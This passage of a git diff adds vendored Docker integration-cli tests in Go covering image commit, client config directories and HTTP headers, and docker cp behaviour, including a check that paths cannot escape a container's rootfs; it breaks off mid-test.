targetLayerDigest, []byte("This is not the data you are looking for.")) + + // Now try pulling that image by digest. We should get an error about + // digest verification for the target layer digest. + + // Remove distribution cache to force a re-pull of the blobs + if err := os.RemoveAll(filepath.Join(dockerBasePath, "image", s.d.storageDriver, "distribution")); err != nil { + c.Fatalf("error clearing distribution cache: %v", err) + } + + // Pull from the registry using the @ reference. 
+ imageReference := fmt.Sprintf("%s@%s", repoName, manifestDigest) + out, exitStatus, _ := dockerCmdWithError("pull", imageReference) + c.Assert(exitStatus, checker.Not(check.Equals), 0, check.Commentf("expected a non-zero exit status")) + + expectedErrorMsg := fmt.Sprintf("filesystem layer verification failed for digest %s", targetLayerDigest) + c.Assert(out, checker.Contains, expectedErrorMsg, check.Commentf("expected error message in output: %s", out)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go new file mode 100644 index 0000000000..8008ae1716 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go @@ -0,0 +1,157 @@ +package main + +import ( + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestCommitAfterContainerIsDone(c *check.C) { + out, _ := dockerCmd(c, "run", "-i", "-a", "stdin", "busybox", "echo", "foo") + + cleanedContainerID := strings.TrimSpace(out) + + dockerCmd(c, "wait", cleanedContainerID) + + out, _ = dockerCmd(c, "commit", cleanedContainerID) + + cleanedImageID := strings.TrimSpace(out) + + dockerCmd(c, "inspect", cleanedImageID) +} + +func (s *DockerSuite) TestCommitWithoutPause(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-i", "-a", "stdin", "busybox", "echo", "foo") + + cleanedContainerID := strings.TrimSpace(out) + + dockerCmd(c, "wait", cleanedContainerID) + + out, _ = dockerCmd(c, "commit", "-p=false", cleanedContainerID) + + cleanedImageID := strings.TrimSpace(out) + + dockerCmd(c, "inspect", cleanedImageID) +} + +//test commit a paused container should not unpause it after commit +func (s *DockerSuite) TestCommitPausedContainer(c *check.C) { + testRequires(c, DaemonIsLinux) + defer unpauseAllContainers() + out, _ := dockerCmd(c, "run", "-i", "-d", "busybox") + + 
cleanedContainerID := strings.TrimSpace(out) + + dockerCmd(c, "pause", cleanedContainerID) + + out, _ = dockerCmd(c, "commit", cleanedContainerID) + + out = inspectField(c, cleanedContainerID, "State.Paused") + // commit should not unpause a paused container + c.Assert(out, checker.Contains, "true") +} + +func (s *DockerSuite) TestCommitNewFile(c *check.C) { + dockerCmd(c, "run", "--name", "commiter", "busybox", "/bin/sh", "-c", "echo koye > /foo") + + imageID, _ := dockerCmd(c, "commit", "commiter") + imageID = strings.TrimSpace(imageID) + + out, _ := dockerCmd(c, "run", imageID, "cat", "/foo") + actual := strings.TrimSpace(out) + c.Assert(actual, checker.Equals, "koye") +} + +func (s *DockerSuite) TestCommitHardlink(c *check.C) { + testRequires(c, DaemonIsLinux) + firstOutput, _ := dockerCmd(c, "run", "-t", "--name", "hardlinks", "busybox", "sh", "-c", "touch file1 && ln file1 file2 && ls -di file1 file2") + + chunks := strings.Split(strings.TrimSpace(firstOutput), " ") + inode := chunks[0] + chunks = strings.SplitAfterN(strings.TrimSpace(firstOutput), " ", 2) + c.Assert(chunks[1], checker.Contains, chunks[0], check.Commentf("Failed to create hardlink in a container. Expected to find %q in %q", inode, chunks[1:])) + + imageID, _ := dockerCmd(c, "commit", "hardlinks", "hardlinks") + imageID = strings.TrimSpace(imageID) + + secondOutput, _ := dockerCmd(c, "run", "-t", "hardlinks", "ls", "-di", "file1", "file2") + + chunks = strings.Split(strings.TrimSpace(secondOutput), " ") + inode = chunks[0] + chunks = strings.SplitAfterN(strings.TrimSpace(secondOutput), " ", 2) + c.Assert(chunks[1], checker.Contains, chunks[0], check.Commentf("Failed to create hardlink in a container. 
Expected to find %q in %q", inode, chunks[1:])) +} + +func (s *DockerSuite) TestCommitTTY(c *check.C) { + dockerCmd(c, "run", "-t", "--name", "tty", "busybox", "/bin/ls") + + imageID, _ := dockerCmd(c, "commit", "tty", "ttytest") + imageID = strings.TrimSpace(imageID) + + dockerCmd(c, "run", "ttytest", "/bin/ls") +} + +func (s *DockerSuite) TestCommitWithHostBindMount(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "--name", "bind-commit", "-v", "/dev/null:/winning", "busybox", "true") + + imageID, _ := dockerCmd(c, "commit", "bind-commit", "bindtest") + imageID = strings.TrimSpace(imageID) + + dockerCmd(c, "run", "bindtest", "true") +} + +func (s *DockerSuite) TestCommitChange(c *check.C) { + dockerCmd(c, "run", "--name", "test", "busybox", "true") + + imageID, _ := dockerCmd(c, "commit", + "--change", "EXPOSE 8080", + "--change", "ENV DEBUG true", + "--change", "ENV test 1", + "--change", "ENV PATH /foo", + "--change", "LABEL foo bar", + "--change", "CMD [\"/bin/sh\"]", + "--change", "WORKDIR /opt", + "--change", "ENTRYPOINT [\"/bin/sh\"]", + "--change", "USER testuser", + "--change", "VOLUME /var/lib/docker", + "--change", "ONBUILD /usr/local/bin/python-build --dir /app/src", + "test", "test-commit") + imageID = strings.TrimSpace(imageID) + + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + prefix = strings.ToUpper(prefix) // Force C: as that's how WORKDIR is normalised on Windows + expected := map[string]string{ + "Config.ExposedPorts": "map[8080/tcp:{}]", + "Config.Env": "[DEBUG=true test=1 PATH=/foo]", + "Config.Labels": "map[foo:bar]", + "Config.Cmd": "[/bin/sh]", + "Config.WorkingDir": prefix + slash + "opt", + "Config.Entrypoint": "[/bin/sh]", + "Config.User": "testuser", + "Config.Volumes": "map[/var/lib/docker:{}]", + "Config.OnBuild": "[/usr/local/bin/python-build --dir /app/src]", + } + + for conf, value := range expected { + res := inspectField(c, imageID, conf) + if res != value { + c.Errorf("%s('%s'), expected %s", conf, 
res, value) + } + } +} + +func (s *DockerSuite) TestCommitChangeLabels(c *check.C) { + dockerCmd(c, "run", "--name", "test", "--label", "some=label", "busybox", "true") + + imageID, _ := dockerCmd(c, "commit", + "--change", "LABEL some=label2", + "test", "test-commit") + imageID = strings.TrimSpace(imageID) + + c.Assert(inspectField(c, imageID, "Config.Labels"), checker.Equals, "map[some:label2]") + // check that container labels didn't change + c.Assert(inspectField(c, "test", "Config.Labels"), checker.Equals, "map[some:label]") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go new file mode 100644 index 0000000000..1d5e5ad3db --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go @@ -0,0 +1,140 @@ +package main + +import ( + "io/ioutil" + "net/http" + "net/http/httptest" + "os" + "os/exec" + "path/filepath" + "runtime" + + "github.com/docker/docker/api" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/pkg/homedir" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestConfigHTTPHeader(c *check.C) { + testRequires(c, UnixCli) // Can't set/unset HOME on windows right now + // We either need a level of Go that supports Unsetenv (for cases + // when HOME/USERPROFILE isn't set), or we need to be able to use + // os/user but user.Current() only works if we aren't statically compiling + + var headers map[string][]string + + server := httptest.NewServer(http.HandlerFunc( + func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("API-Version", api.DefaultVersion) + headers = r.Header + })) + defer server.Close() + + homeKey := homedir.Key() + homeVal := homedir.Get() + tmpDir, err := ioutil.TempDir("", "fake-home") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpDir) + + dotDocker := filepath.Join(tmpDir, ".docker") + 
os.Mkdir(dotDocker, 0600) + tmpCfg := filepath.Join(dotDocker, "config.json") + + defer func() { os.Setenv(homeKey, homeVal) }() + os.Setenv(homeKey, tmpDir) + + data := `{ + "HttpHeaders": { "MyHeader": "MyValue" } + }` + + err = ioutil.WriteFile(tmpCfg, []byte(data), 0600) + c.Assert(err, checker.IsNil) + + cmd := exec.Command(dockerBinary, "-H="+server.URL[7:], "ps") + out, _, _ := runCommandWithOutput(cmd) + + c.Assert(headers["User-Agent"], checker.NotNil, check.Commentf("Missing User-Agent")) + + c.Assert(headers["User-Agent"][0], checker.Equals, "Docker-Client/"+dockerversion.Version+" ("+runtime.GOOS+")", check.Commentf("Badly formatted User-Agent,out:%v", out)) + + c.Assert(headers["Myheader"], checker.NotNil) + c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("Missing/bad header,out:%v", out)) + +} + +func (s *DockerSuite) TestConfigDir(c *check.C) { + cDir, err := ioutil.TempDir("", "fake-home") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(cDir) + + // First make sure pointing to empty dir doesn't generate an error + dockerCmd(c, "--config", cDir, "ps") + + // Test with env var too + cmd := exec.Command(dockerBinary, "ps") + cmd.Env = appendBaseEnv(true, "DOCKER_CONFIG="+cDir) + out, _, err := runCommandWithOutput(cmd) + + c.Assert(err, checker.IsNil, check.Commentf("ps2 didn't work,out:%v", out)) + + // Start a server so we can check to see if the config file was + // loaded properly + var headers map[string][]string + + server := httptest.NewServer(http.HandlerFunc( + func(w http.ResponseWriter, r *http.Request) { + headers = r.Header + })) + defer server.Close() + + // Create a dummy config file in our new config dir + data := `{ + "HttpHeaders": { "MyHeader": "MyValue" } + }` + + tmpCfg := filepath.Join(cDir, "config.json") + err = ioutil.WriteFile(tmpCfg, []byte(data), 0600) + c.Assert(err, checker.IsNil, check.Commentf("Err creating file")) + + env := appendBaseEnv(false) + + cmd = exec.Command(dockerBinary, 
"--config", cDir, "-H="+server.URL[7:], "ps") + cmd.Env = env + out, _, err = runCommandWithOutput(cmd) + + c.Assert(err, checker.NotNil, check.Commentf("out:%v", out)) + c.Assert(headers["Myheader"], checker.NotNil) + c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("ps3 - Missing header,out:%v", out)) + + // Reset headers and try again using env var this time + headers = map[string][]string{} + cmd = exec.Command(dockerBinary, "-H="+server.URL[7:], "ps") + cmd.Env = append(env, "DOCKER_CONFIG="+cDir) + out, _, err = runCommandWithOutput(cmd) + + c.Assert(err, checker.NotNil, check.Commentf("%v", out)) + c.Assert(headers["Myheader"], checker.NotNil) + c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("ps4 - Missing header,out:%v", out)) + + // Reset headers and make sure flag overrides the env var + headers = map[string][]string{} + cmd = exec.Command(dockerBinary, "--config", cDir, "-H="+server.URL[7:], "ps") + cmd.Env = append(env, "DOCKER_CONFIG=MissingDir") + out, _, err = runCommandWithOutput(cmd) + + c.Assert(err, checker.NotNil, check.Commentf("out:%v", out)) + c.Assert(headers["Myheader"], checker.NotNil) + c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("ps5 - Missing header,out:%v", out)) + + // Reset headers and make sure flag overrides the env var. + // Almost same as previous but make sure the "MissingDir" isn't + // ignore - we don't want to default back to the env var. 
+ headers = map[string][]string{} + cmd = exec.Command(dockerBinary, "--config", "MissingDir", "-H="+server.URL[7:], "ps") + cmd.Env = append(env, "DOCKER_CONFIG="+cDir) + out, _, err = runCommandWithOutput(cmd) + + c.Assert(err, checker.NotNil, check.Commentf("out:%v", out)) + c.Assert(headers["Myheader"], checker.IsNil, check.Commentf("ps6 - Headers shouldn't be the expected value,out:%v", out)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go new file mode 100644 index 0000000000..9ed7e8c720 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go @@ -0,0 +1,488 @@ +package main + +import ( + "os" + "path/filepath" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// docker cp CONTAINER:PATH LOCALPATH + +// Try all of the test cases from the archive package which implements the +// internals of `docker cp` and ensure that the behavior matches when actually +// copying to and from containers. + +// Basic assumptions about SRC and DST: +// 1. SRC must exist. +// 2. If SRC ends with a trailing separator, it must be a directory. +// 3. DST parent directory must exist. +// 4. If DST exists as a file, it must not end with a trailing separator. + +// First get these easy error cases out of the way. + +// Test for error when SRC does not exist. 
+func (s *DockerSuite) TestCpFromErrSrcNotExists(c *check.C) { + containerID := makeTestContainer(c, testContainerOptions{}) + + tmpDir := getTestDir(c, "test-cp-from-err-src-not-exists") + defer os.RemoveAll(tmpDir) + + err := runDockerCp(c, containerCpPath(containerID, "file1"), tmpDir) + c.Assert(err, checker.NotNil) + + c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) +} + +// Test for error when SRC ends in a trailing +// path separator but it exists as a file. +func (s *DockerSuite) TestCpFromErrSrcNotDir(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{addContent: true}) + + tmpDir := getTestDir(c, "test-cp-from-err-src-not-dir") + defer os.RemoveAll(tmpDir) + + err := runDockerCp(c, containerCpPathTrailingSep(containerID, "file1"), tmpDir) + c.Assert(err, checker.NotNil) + + c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err)) +} + +// Test for error when SRC is a valid file or directory, +// but the DST parent directory does not exist. +func (s *DockerSuite) TestCpFromErrDstParentNotExists(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{addContent: true}) + + tmpDir := getTestDir(c, "test-cp-from-err-dst-parent-not-exists") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + // Try with a file source. + srcPath := containerCpPath(containerID, "/file1") + dstPath := cpPath(tmpDir, "notExists", "file1") + + err := runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.NotNil) + + c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) + + // Try with a directory source. 
+ srcPath = containerCpPath(containerID, "/dir1") + + err = runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.NotNil) + + c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) +} + +// Test for error when DST ends in a trailing +// path separator but exists as a file. +func (s *DockerSuite) TestCpFromErrDstNotDir(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{addContent: true}) + + tmpDir := getTestDir(c, "test-cp-from-err-dst-not-dir") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + // Try with a file source. + srcPath := containerCpPath(containerID, "/file1") + dstPath := cpPathTrailingSep(tmpDir, "file1") + + err := runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.NotNil) + + c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err)) + + // Try with a directory source. + srcPath = containerCpPath(containerID, "/dir1") + + err = runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.NotNil) + + c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err)) +} + +// Check that copying from a container to a local symlink copies to the symlink +// target and does not overwrite the local symlink itself. +func (s *DockerSuite) TestCpFromSymlinkDestination(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{addContent: true}) + + tmpDir := getTestDir(c, "test-cp-from-err-dst-not-dir") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + // First, copy a file from the container to a symlink to a file. This + // should overwrite the symlink target contents with the source contents. 
+ srcPath := containerCpPath(containerID, "/file2") + dstPath := cpPath(tmpDir, "symlinkToFile1") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + // The symlink should not have been modified. + c.Assert(symlinkTargetEquals(c, dstPath, "file1"), checker.IsNil) + + // The file should have the contents of "file2" now. + c.Assert(fileContentEquals(c, cpPath(tmpDir, "file1"), "file2\n"), checker.IsNil) + + // Next, copy a file from the container to a symlink to a directory. This + // should copy the file into the symlink target directory. + dstPath = cpPath(tmpDir, "symlinkToDir1") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + // The symlink should not have been modified. + c.Assert(symlinkTargetEquals(c, dstPath, "dir1"), checker.IsNil) + + // The file should have the contents of "file2" now. + c.Assert(fileContentEquals(c, cpPath(tmpDir, "file2"), "file2\n"), checker.IsNil) + + // Next, copy a file from the container to a symlink to a file that does + // not exist (a broken symlink). This should create the target file with + // the contents of the source file. + dstPath = cpPath(tmpDir, "brokenSymlinkToFileX") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + // The symlink should not have been modified. + c.Assert(symlinkTargetEquals(c, dstPath, "fileX"), checker.IsNil) + + // The file should have the contents of "file2" now. + c.Assert(fileContentEquals(c, cpPath(tmpDir, "fileX"), "file2\n"), checker.IsNil) + + // Next, copy a directory from the container to a symlink to a local + // directory. This should copy the directory into the symlink target + // directory and not modify the symlink. + srcPath = containerCpPath(containerID, "/dir2") + dstPath = cpPath(tmpDir, "symlinkToDir1") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + // The symlink should not have been modified. 
+ c.Assert(symlinkTargetEquals(c, dstPath, "dir1"), checker.IsNil) + + // The directory should now contain a copy of "dir2". + c.Assert(fileContentEquals(c, cpPath(tmpDir, "dir1/dir2/file2-1"), "file2-1\n"), checker.IsNil) + + // Next, copy a directory from the container to a symlink to a local + // directory that does not exist (a broken symlink). This should create + // the target as a directory with the contents of the source directory. It + // should not modify the symlink. + dstPath = cpPath(tmpDir, "brokenSymlinkToDirX") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + // The symlink should not have been modified. + c.Assert(symlinkTargetEquals(c, dstPath, "dirX"), checker.IsNil) + + // The "dirX" directory should now be a copy of "dir2". + c.Assert(fileContentEquals(c, cpPath(tmpDir, "dirX/file2-1"), "file2-1\n"), checker.IsNil) +} + +// Possibilities are reduced to the remaining 10 cases: +// +// case | srcIsDir | onlyDirContents | dstExists | dstIsDir | dstTrSep | action +// =================================================================================================== +// A | no | - | no | - | no | create file +// B | no | - | no | - | yes | error +// C | no | - | yes | no | - | overwrite file +// D | no | - | yes | yes | - | create file in dst dir +// E | yes | no | no | - | - | create dir, copy contents +// F | yes | no | yes | no | - | error +// G | yes | no | yes | yes | - | copy dir and contents +// H | yes | yes | no | - | - | create dir, copy contents +// I | yes | yes | yes | no | - | error +// J | yes | yes | yes | yes | - | copy dir contents +// + +// A. SRC specifies a file and DST (no trailing path separator) doesn't +// exist. This should create a file with the name DST and copy the +// contents of the source file into it. 
+func (s *DockerSuite) TestCpFromCaseA(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, workDir: "/root", + }) + + tmpDir := getTestDir(c, "test-cp-from-case-a") + defer os.RemoveAll(tmpDir) + + srcPath := containerCpPath(containerID, "/root/file1") + dstPath := cpPath(tmpDir, "itWorks.txt") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil) +} + +// B. SRC specifies a file and DST (with trailing path separator) doesn't +// exist. This should cause an error because the copy operation cannot +// create a directory when copying a single file. +func (s *DockerSuite) TestCpFromCaseB(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{addContent: true}) + + tmpDir := getTestDir(c, "test-cp-from-case-b") + defer os.RemoveAll(tmpDir) + + srcPath := containerCpPath(containerID, "/file1") + dstDir := cpPathTrailingSep(tmpDir, "testDir") + + err := runDockerCp(c, srcPath, dstDir) + c.Assert(err, checker.NotNil) + + c.Assert(isCpDirNotExist(err), checker.True, check.Commentf("expected DirNotExists error, but got %T: %s", err, err)) +} + +// C. SRC specifies a file and DST exists as a file. This should overwrite +// the file at DST with the contents of the source file. +func (s *DockerSuite) TestCpFromCaseC(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, workDir: "/root", + }) + + tmpDir := getTestDir(c, "test-cp-from-case-c") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcPath := containerCpPath(containerID, "/root/file1") + dstPath := cpPath(tmpDir, "file2") + + // Ensure the local file starts with different content. 
+ c.Assert(fileContentEquals(c, dstPath, "file2\n"), checker.IsNil) + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil) +} + +// D. SRC specifies a file and DST exists as a directory. This should place +// a copy of the source file inside it using the basename from SRC. Ensure +// this works whether DST has a trailing path separator or not. +func (s *DockerSuite) TestCpFromCaseD(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{addContent: true}) + + tmpDir := getTestDir(c, "test-cp-from-case-d") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcPath := containerCpPath(containerID, "/file1") + dstDir := cpPath(tmpDir, "dir1") + dstPath := filepath.Join(dstDir, "file1") + + // Ensure that dstPath doesn't exist. + _, err := os.Stat(dstPath) + c.Assert(os.IsNotExist(err), checker.True, check.Commentf("did not expect dstPath %q to exist", dstPath)) + + c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil) + + // Now try again but using a trailing path separator for dstDir. + + // unable to remove dstDir + c.Assert(os.RemoveAll(dstDir), checker.IsNil) + + // unable to make dstDir + c.Assert(os.MkdirAll(dstDir, os.FileMode(0755)), checker.IsNil) + + dstDir = cpPathTrailingSep(tmpDir, "dir1") + + c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil) +} + +// E. SRC specifies a directory and DST does not exist. This should create a +// directory at DST and copy the contents of the SRC directory into the DST +// directory. Ensure this works whether DST has a trailing path separator or +// not. 
+func (s *DockerSuite) TestCpFromCaseE(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{addContent: true}) + + tmpDir := getTestDir(c, "test-cp-from-case-e") + defer os.RemoveAll(tmpDir) + + srcDir := containerCpPath(containerID, "dir1") + dstDir := cpPath(tmpDir, "testDir") + dstPath := filepath.Join(dstDir, "file1-1") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) + + // Now try again but using a trailing path separator for dstDir. + + // unable to remove dstDir + c.Assert(os.RemoveAll(dstDir), checker.IsNil) + + dstDir = cpPathTrailingSep(tmpDir, "testDir") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) +} + +// F. SRC specifies a directory and DST exists as a file. This should cause an +// error as it is not possible to overwrite a file with a directory. +func (s *DockerSuite) TestCpFromCaseF(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, workDir: "/root", + }) + + tmpDir := getTestDir(c, "test-cp-from-case-f") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcDir := containerCpPath(containerID, "/root/dir1") + dstFile := cpPath(tmpDir, "file1") + + err := runDockerCp(c, srcDir, dstFile) + c.Assert(err, checker.NotNil) + + c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err)) +} + +// G. SRC specifies a directory and DST exists as a directory. This should copy +// the SRC directory and all its contents to the DST directory. Ensure this +// works whether DST has a trailing path separator or not. 
+func (s *DockerSuite) TestCpFromCaseG(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, workDir: "/root", + }) + + tmpDir := getTestDir(c, "test-cp-from-case-g") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcDir := containerCpPath(containerID, "/root/dir1") + dstDir := cpPath(tmpDir, "dir2") + resultDir := filepath.Join(dstDir, "dir1") + dstPath := filepath.Join(resultDir, "file1-1") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) + + // Now try again but using a trailing path separator for dstDir. + + // unable to remove dstDir + c.Assert(os.RemoveAll(dstDir), checker.IsNil) + + // unable to make dstDir + c.Assert(os.MkdirAll(dstDir, os.FileMode(0755)), checker.IsNil) + + dstDir = cpPathTrailingSep(tmpDir, "dir2") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) +} + +// H. SRC specifies a directory's contents only and DST does not exist. This +// should create a directory at DST and copy the contents of the SRC +// directory (but not the directory itself) into the DST directory. Ensure +// this works whether DST has a trailing path separator or not. +func (s *DockerSuite) TestCpFromCaseH(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{addContent: true}) + + tmpDir := getTestDir(c, "test-cp-from-case-h") + defer os.RemoveAll(tmpDir) + + srcDir := containerCpPathTrailingSep(containerID, "dir1") + "." + dstDir := cpPath(tmpDir, "testDir") + dstPath := filepath.Join(dstDir, "file1-1") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) + + // Now try again but using a trailing path separator for dstDir. 
+ + // unable to remove resultDir + c.Assert(os.RemoveAll(dstDir), checker.IsNil) + + dstDir = cpPathTrailingSep(tmpDir, "testDir") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) +} + +// I. SRC specifies a directory's contents only and DST exists as a file. This +// should cause an error as it is not possible to overwrite a file with a +// directory. +func (s *DockerSuite) TestCpFromCaseI(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, workDir: "/root", + }) + + tmpDir := getTestDir(c, "test-cp-from-case-i") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcDir := containerCpPathTrailingSep(containerID, "/root/dir1") + "." + dstFile := cpPath(tmpDir, "file1") + + err := runDockerCp(c, srcDir, dstFile) + c.Assert(err, checker.NotNil) + + c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err)) +} + +// J. SRC specifies a directory's contents only and DST exists as a directory. +// This should copy the contents of the SRC directory (but not the directory +// itself) into the DST directory. Ensure this works whether DST has a +// trailing path separator or not. +func (s *DockerSuite) TestCpFromCaseJ(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, workDir: "/root", + }) + + tmpDir := getTestDir(c, "test-cp-from-case-j") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcDir := containerCpPathTrailingSep(containerID, "/root/dir1") + "." + dstDir := cpPath(tmpDir, "dir2") + dstPath := filepath.Join(dstDir, "file1-1") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) + + // Now try again but using a trailing path separator for dstDir. 
+ + // unable to remove dstDir + c.Assert(os.RemoveAll(dstDir), checker.IsNil) + + // unable to make dstDir + c.Assert(os.MkdirAll(dstDir, os.FileMode(0755)), checker.IsNil) + + dstDir = cpPathTrailingSep(tmpDir, "dir2") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go new file mode 100644 index 0000000000..4e5c39e998 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go @@ -0,0 +1,660 @@ +package main + +import ( + "bytes" + "fmt" + "io/ioutil" + "os" + "os/exec" + "path" + "path/filepath" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/go-check/check" +) + +const ( + cpTestPathParent = "/some" + cpTestPath = "/some/path" + cpTestName = "test" + cpFullPath = "/some/path/test" + + cpContainerContents = "holla, i am the container" + cpHostContents = "hello, i am the host" +) + +// Ensure that an all-local path case returns an error. 
+func (s *DockerSuite) TestCpLocalOnly(c *check.C) { + err := runDockerCp(c, "foo", "bar") + c.Assert(err, checker.NotNil) + + c.Assert(err.Error(), checker.Contains, "must specify at least one container source") +} + +// Test for #5656 +// Check that garbage paths don't escape the container's rootfs +func (s *DockerSuite) TestCpGarbagePath(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir -p '"+cpTestPath+"' && echo -n '"+cpContainerContents+"' > "+cpFullPath) + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + c.Assert(os.MkdirAll(cpTestPath, os.ModeDir), checker.IsNil) + + hostFile, err := os.Create(cpFullPath) + c.Assert(err, checker.IsNil) + defer hostFile.Close() + defer os.RemoveAll(cpTestPathParent) + + fmt.Fprintf(hostFile, "%s", cpHostContents) + + tmpdir, err := ioutil.TempDir("", "docker-integration") + c.Assert(err, checker.IsNil) + + tmpname := filepath.Join(tmpdir, 